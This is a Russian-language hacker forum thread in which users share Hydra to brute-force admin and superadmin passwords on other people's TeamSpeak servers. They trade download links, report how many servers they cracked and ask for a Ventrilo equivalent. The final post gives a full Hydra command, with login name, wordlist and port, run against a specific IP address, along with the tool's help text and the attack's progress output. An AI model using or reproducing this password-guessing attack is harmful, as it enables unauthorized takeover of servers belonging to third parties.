PDA

Просмотр полной версии : Подбор пароля админа/суперадмина к голосовому чату TeamSpeak


Isis
01.06.2007, 18:37
TeamSpeak BruteForce using Hydra

Довольно-таки рабочий брут пароля админа/суперадмина TeamSpeak сервера !!!

Качать Hydra (http://rapidshare.com/files/34633372/hydra.rar)
Видео о настройке (http://www.youtube.com/watch?v=TDz8cxq4jnE)

zooomer
23.06.2007, 22:35
Перезалейте плиз гидру еще куднить....ошибкувыдаёт...за анее спасибо..

zooomer
04.08.2007, 14:53
Всё ок..спс...

YurSem
30.08.2007, 21:02
А для вентрило есть что-нибудь подобное?

Molekular
11.10.2007, 11:39
TeamSpeak BruteForce using Hydra

Довольно-таки рабочий брут пароля админа/суперадмина TeamSpeak сервера !!!

Качать Hydra (http://rapidshare.com/files/34633372/hydra.rar)
Видео о настройке (http://www.youtube.com/watch?v=TDz8cxq4jnE)
На данный момент я пробовал брутить гидрой множество ТС. Из 15 пробрутилось только 3. Большинство пофиксили. Не могли бы вы выложить что-нибудь поновее. Заранее благодарю.

DontWorryBeHappy
06.03.2009, 21:03
Помогите пожалуйста уважаемые хакеры! Пытался сделать все как в описании в конечном итоге пишет это:

Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.
C:\Documents and Settings\Андрей>cd "C:\Documents and Settings\Андрей\Рабочий стол\hydra"
C:\Documents and Settings\Андрей\Рабочий стол\hydra>hydra
Hydra v5.3 [http://www.thc.org] (c) 2006 by van Hauser / THC <vh@thc.org>
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]

Options:
-R restore a previous aborted/crashed session
-S connect via SSL
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-e ns additional checks, "n" for null password, "s" try login as pass
-C FILE colon seperated "login:pass" format, instead of -L/-P options
-M FILE server list for parallel attacks, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f exit after the first found login/password pair (per host if -M)
-t TASKS run TASKS number of connects in parallel (default: 16)
-w TIME defines the max wait time in seconds for responses (default: 30)
-v / -V verbose mode / show login+pass combination for each attempt
server the target server (use either this OR the -M option)
service the service to crack. Supported protocols: telnet ftp pop3[-ntlm]
imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco
cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener
postgres nntp socks5
rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhereteamspeak sip vmauthd
OPT some service modules need special input (see README!)
Use HYDRA_PROXY_HTTP/HYDRA_PROXY_CONNECT and HYDRA_PROXY_AUTH env for a proxy.
Hydra is a tool to guess/crack valid login/password pairs - use allowed only
for legal purposes! If used commercially, tool name, version and web address
must be mentioned in the report. Find the newest version at http://www.thc.org
C:\Documents and Settings\Андрей\Рабочий стол\hydra>hydra -l skert -P "C:\Documents and Settings\Андрей\Рабочий стол\hydra\7.txt" -s 8767 -v 90.189.192.126 teamspeak

WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
Hydra v5.3 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2004-07-30 22:28:52
[DATA] 16 tasks, 1 servers, 170636 login tries (l:1/p:170636), ~10664 tries per
task
[DATA] attacking service teamspeak on port 8767
[VERBOSE] Resolving addresses ... done
[STATUS] 14792.00 tries/min, 14792 tries in 00:01h, 155844 todo in 00:11h
[STATUS] 14931.67 tries/min, 44795 tries in 00:03h, 125841 todo in 00:09h
[VERBOSE] Writing restore file... done
[STATUS] 14941.43 tries/min, 104590 tries in 00:07h, 66046 todo in 00:05h
[VERBOSE] Writing restore file... done
[STATUS] attack finished for 90.189.192.126 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2004-07-30 22:40:21
http://s46.radikal.ru/i112/0812/07/5fcf908402d8.gif